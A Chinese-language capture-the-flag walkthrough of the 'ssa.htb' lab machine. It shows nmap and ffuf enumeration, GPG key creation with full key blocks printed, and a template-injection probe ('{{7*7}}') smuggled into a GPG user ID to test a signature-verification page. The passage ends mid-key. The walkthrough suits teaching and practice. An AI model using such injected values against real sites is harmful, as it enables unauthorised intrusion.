靶场信息

信息收集

Nmap

首先加入一个 hosts 解析

echo 10.10.11.218 ssa.htb >> /etc/hosts
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sC -sV -A -p- --min-rate=10000 10.10.11.218
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-29 21:51 CST
Warning: 10.10.11.218 giving up on port because retransmission cap hit (10).
Nmap scan report for ssa.htb (10.10.11.218)
Host is up (0.40s latency).
Not shown: 64083 closed tcp ports (reset), 1449 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after:  2050-09-19T18:03:25
|_http-server-header: nginx/1.18.0 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   465.69 ms 10.10.16.1
2   320.25 ms ssa.htb (10.10.11.218)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.15 seconds

Http

就一个页面,也没什么内容,做个 Fuzz 吧

Fuzz

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u 'https://ssa.htb/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : https://ssa.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

admin                   [Status: 302, Size: 227, Words: 18, Lines: 6, Duration: 1728ms]
contact                 [Status: 200, Size: 3543, Words: 772, Lines: 69, Duration: 1169ms]
login                   [Status: 200, Size: 4392, Words: 1374, Lines: 83, Duration: 1169ms]
logout                  [Status: 302, Size: 229, Words: 18, Lines: 6, Duration: 1174ms]
about                   [Status: 200, Size: 5584, Words: 1147, Lines: 77, Duration: 2395ms]
view                    [Status: 302, Size: 225, Words: 18, Lines: 6, Duration: 1556ms]
guide                   [Status: 200, Size: 9043, Words: 1771, Lines: 155, Duration: 1976ms]
process                 [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 1424ms]
                        [Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 2046ms]
pgp                     [Status: 200, Size: 3187, Words: 9, Lines: 54, Duration: 1074ms]
:: Progress: [30000/30000] :: Job [1/1] :: 66 req/sec :: Duration: [0:17:33] :: Errors: 2 ::

到处看看

登录面板

访问 login 和 admin、view 都会跳转到登录页面

contact

提交 PGP 的页面

guide

允许我们利用 PGP 公钥加密、解密或验证文本

在最底下有一个可用的用户名 atlas

PGP

是网站的 PGP 公钥

漏洞利用

https://linuxhint.com/generate-pgp-keys-gpg/

经过搜索,可以使用上面地址里提到的方法来生成 PGP 公私钥

GPG 创建

┌──(root㉿kali)-[~/Desktop]
└─# gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

注意:使用 “gpg --full-generate-key” 以获得一个全功能的密钥生成对话框。

GnuPG 需要构建用户标识以辨认您的密钥。

真实姓名: Lucifiel
电子邮件地址: LucifielHack@qq.com
您选定了此用户标识:
    “Lucifiel <LucifielHack@qq.com>”

更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o
我们需要生成大量的随机字节。在质数生成期间做些其他操作(敲打键盘
、移动鼠标、读写硬盘之类的)将会是一个不错的主意;这会让随机数
发生器有更好的机会获得足够的熵。
我们需要生成大量的随机字节。在质数生成期间做些其他操作(敲打键盘
、移动鼠标、读写硬盘之类的)将会是一个不错的主意;这会让随机数
发生器有更好的机会获得足够的熵。
gpg: /root/.gnupg/trustdb.gpg:建立了信任度数据库
gpg: 目录‘/root/.gnupg/openpgp-revocs.d’已创建
gpg: 吊销证书已被存储为‘/root/.gnupg/openpgp-revocs.d/99DC61F38F13D6BDB2736B258E229F58650BFB3E.rev’
公钥和私钥已经生成并被签名。

pub   rsa3072 2023-06-29 [SC] [有效至:2025-06-28]
      99DC61F38F13D6BDB2736B258E229F58650BFB3E
uid                      Lucifiel <LucifielHack@qq.com>
sub   rsa3072 2023-06-29 [E] [有效至:2025-06-28]

导出公钥

┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o public.key --export Lucifiel
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key 
-----BEGIN PGP PUBLIC KEY BLOCK-----

mQGNBGSdlHIBDADT20d9aSJjEaF5etEV39gJBLc7c35Q7cgwBUi9aW0FcrcYYWV5
AJJ2xloIWbavsgG1bjPo2SwgP0iRscX6yFRQ21OtVibkWB6fRfi7BWxc/mxEo0XU
lFO4ufb2taRMRmlxvg78xwia7WXIVF+UR/iHJeH/U+UbVh0hFZNQKrKiRHlzWagb
yGhNz8LDHMIPWUp1AiVqoMNXv4TwRM+SUMsQi7K862oixnJAjrgThIn6bwOPNnPm
spi7QUj8JcjEBvicVXlCaD1WkfkeNDHMq1xH3LW5/2gzTauouLsxBdAv3soImLXE
huyxG5arc6oekAGJ3wpizA1g8pJQ5DnUUe419cBnL0M+tMgZMboOauEOP1BLD9ZH
pwaktBoQnUXaj4jY3jHFHhyP+rWDvcFJshm/zy05nAKqRtA8cidlYtEpAuJrAArM
hwg6v73HVkpjiSWFihYRZhBUtjJsEekUzx7eyZtkb+KH7wmBqEgpBPoNZJR7HjD5
SohFOy3XWJe87UcAEQEAAbQeTHVjaWZpZWwgPEx1Y2lmaWVsSGFja0BxcS5jb20+
iQHUBBMBCgA+FiEEmdxh848T1r2yc2sljiKfWGUL+z4FAmSdlHICGwMFCQPCZwAF
CwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQjiKfWGUL+z6OwQwAj5c+XBPKhjSs
D+NP8/tQLif8chfIcVJNMzTqvF7ZeQC5NfMka+Sdnnrt9bXqp9LfzFo5KdL2FYVF
869YI8Q36UARE7TIA0GDbHcTxeSthQgud45JEujLWPg0b7A4IZ74RILQtfI+cCfk
9DTEJfQKKEAXlF+OtZkvFy3OBvZq/2RAZ/xJUfZhImgU+A2LZdCLl6Uk8pIM3FGV
pt/l9BqowsbxMePxINY+Nb8UxSsJWL9kmLBAT+TsUfgWbZ8AVam7b0e4mg2u/Ywy
NDgSv7VWDZITs52TE8NIAlfm6F4rUKZ282jqIP4F7fVFYTNisrknxgTXvBNiexEx
bqPHxyuep1GGl2xTvEiSXUe34Mkgw/4UQ0jYxfZDEK3QUTyrMrK0iQ0tlNc3TOAe
O4489UqVuPgACtseklBCVzMQZ6qVhdWIgQUh8lxuWCsRr5etetujb1xkccVRhh5K
Bf95mqMFKrf+UXUgucAQQwYh7zciMe7r7+4h/nIAFlm8yBJrlzz9uQGNBGSdlHIB
DADWy33FFYXK3WbmkZeDZ5symm2d7MCGZgUjuSAkAsNdiaq+ipVWtrxT7XTnUzJy
cKxhiWKghGpnpODOkSC6L5cTn3Qy2mPuPU4xJw3r/uhkZNfDgDuoJDGD6Qn7gRZN
1yCuPadwR/bnCUMzLyeqGtvS9mv6ZpcOZAP2lA1LXlyWVHx0mEnfdTAUEPKCFMx3
tkgwfXn38LSlnTOiI1r4meU6SCxfL+ByLbnlROXYp8U2SGsR5KNHdEXBEFfc3Y5G
dWUIxVSa+QMM+iUBoX+5XDzetGMWQL/vt4W7Te7b+5d4yblsXQ8LAQAIDsbs5PWO
0JhXTQFvcYUiy9xHuHFmo/kV6uYT/QsOtDM36Q2lx8mP0zrQgulVN7uhEUQH0NBs
Jn0h8yWSbSFQrtPDRN0jq4ix27xoIHVE8JV7amh4OD3yzMLzBBBzd8Pz5ixgBOGz
5o1CAfbYnpaCzFv2iQO/Vu5HCqbMt+eXRGVKI7c1+5EV5vrnd9IamFCq1cuRLxsq
Q5EAEQEAAYkBvAQYAQoAJhYhBJncYfOPE9a9snNrJY4in1hlC/s+BQJknZRyAhsM
BQkDwmcAAAoJEI4in1hlC/s+3F4L/i77ZATXTKoORnBt/vy8ugdaLP45Ed0dGzjt
uwq1DsP2LeCmO9fxM2t/nr4nert6pgY1WiINPamXQ8kk4Vf8FV9Mz9R9PeZyHDQs
ahbfGCDI8fVX8iOMgmE1lRBGD5YE1RD5KSRBa3ffL/R0t5WWxCeR2icXaef59PR4
c3wh8jaOJVUoJHia+2aN+/7aaSFAICFkc1x4Pn9HbtNPOyvENClTvDpCrXxqF1gf
+MKzzHkDFWjpHuUozd09Nzhq4reOtsGIuCGrnG3JOqiNx4ywrI0GrRjVdsiG1W4S
B9aAM57uhnd18Ww61zi71rbfEZFgwz225c/9hIgteFT4ZD7SXvaNLYK8qiYsVXxY
3ZU1PvGZTwgLAs/2Fbfkt/GqzB5gtwWYe3HkuL/1cu+NEmNO7Tm1if72lR0OpUlP
n/DUqlp989cTAs8RqJ7x8LL0X+4+8RC+G3laLYNVJDZGiyap01gX6pJv+0SmJylb
/gYsDRdC1IzRUH96wcysVYl8sudf2Q==
=xRpf
-----END PGP PUBLIC KEY BLOCK-----

导出私钥

┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o private-file.key --export-secret-keys Lucifiel
┌──(root㉿kali)-[~/Desktop]
└─# cat private-file.key                                    
-----BEGIN PGP PRIVATE KEY BLOCK-----

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
=4ri8
-----END PGP PRIVATE KEY BLOCK-----

制作和验证签名

┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign      
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

life-time
-----BEGIN PGP SIGNATURE-----

iQGzBAEBCgAdFiEEmdxh848T1r2yc2sljiKfWGUL+z4FAmSdlaYACgkQjiKfWGUL
+z5I9Qv/fqJwqwWkOVx7erSjHkXOIdBwpDOrNutgRZNpV2ONddBViAaIIW81ctJH
TbktO6A+lgnSdLMgXa15RXKsyfpWyk7tJAAjDvmZzhlAmPyRCK1odS1oqWxjSwxx
YhjVY0SmV4To7VuGv3kccnMCKJpRmo2K7LREfjej7Uy0qgcKKUpb6wSfMu856vl0
VCHeKtYM0RwckgqcGlTB/aT1ThzBVb+MGEiFaiVhUrRsznM+N++AK6oM0HCjqHXV
CcI6Y/BR65z/CAo4adrqFqmRzQJ8I9KqCdjePXqrvs1VIQGas1kvtjCGizX6zWUO
iZC9GgybJSeEA/v1ng8GeFxBRX3K1irt4nNIzv+ke/6Xg3csfwQT+UAOC4nsDkQG
4PsHpvtxBlRLf4pdY0lYma97/OX+PPGEBudh997h+6nDEDKlUMwA71OYUk7w5uEW
EWpIVE31L0PwLRVQR5bEsVkzErSBmaaQZaF7CSaHAxPp4IukrlfyvbyLgaii58d5
AIRSUmnE
=QNzT
-----END PGP SIGNATURE-----

GPG 验证

https://ssa.htb/guide 验证一下我们的 GPG 密钥

在回显中,我们在创建 GPG 密钥的时候输入的 name,也就是 Lucifiel 显示在回显中了,我怀疑这里有 SSTI,去重新生成尝试一下

SSTI

https://www.sobyte.net/post/2021-12/modify-gpg-uid-name/

找到了一篇修改 GPG UID 的相关文章

┌──(root㉿kali)-[~/Desktop]
└─# gpg --edit-key LucifielHack@qq.com
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

私钥可用。

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1). Lucifiel <LucifielHack@qq.com>

gpg> adduid
真实姓名: {{7*7}}
电子邮件地址: LucifielHack@qq.com
注释: 
您选定了此用户标识:
    “{{7*7}} <LucifielHack@qq.com>”

更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  Lucifiel <LucifielHack@qq.com>
[ 未知 ] (2). {{7*7}} <LucifielHack@qq.com>

生成好了一个新的 UID,现在我们去提升它的信任等级

gpg> trust
sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  Lucifiel <LucifielHack@qq.com>
[ 未知 ] (2). {{7*7}} <LucifielHack@qq.com>

请决定您对这名用户能否正确地验证其他用户密钥
(通过查看护照,检查不同来源的的指纹等等)的相信程度

  1 = 我不知道或不作答
  2 = 我不相信
  3 = 我勉强相信
  4 = 我完全相信
  5 = 我绝对相信
  m = 回到主菜单

您的决定是什么? 5
您真的要把这个密钥设置成绝对信任?(y/N) y

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  Lucifiel <LucifielHack@qq.com>
[ 未知 ] (2). {{7*7}} <LucifielHack@qq.com>

gpg> uid 1

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)* Lucifiel <LucifielHack@qq.com>
[ 未知 ] (2). {{7*7}} <LucifielHack@qq.com>

gpg> deluid
真的要移除此用户标识吗?(y/N) y

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 未知 ] (1). {{7*7}} <LucifielHack@qq.com>

gpg> save

这样就搞定了

导出公钥

┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o public.key --export {{7*7}}
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key      
-----BEGIN PGP PUBLIC KEY BLOCK-----

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
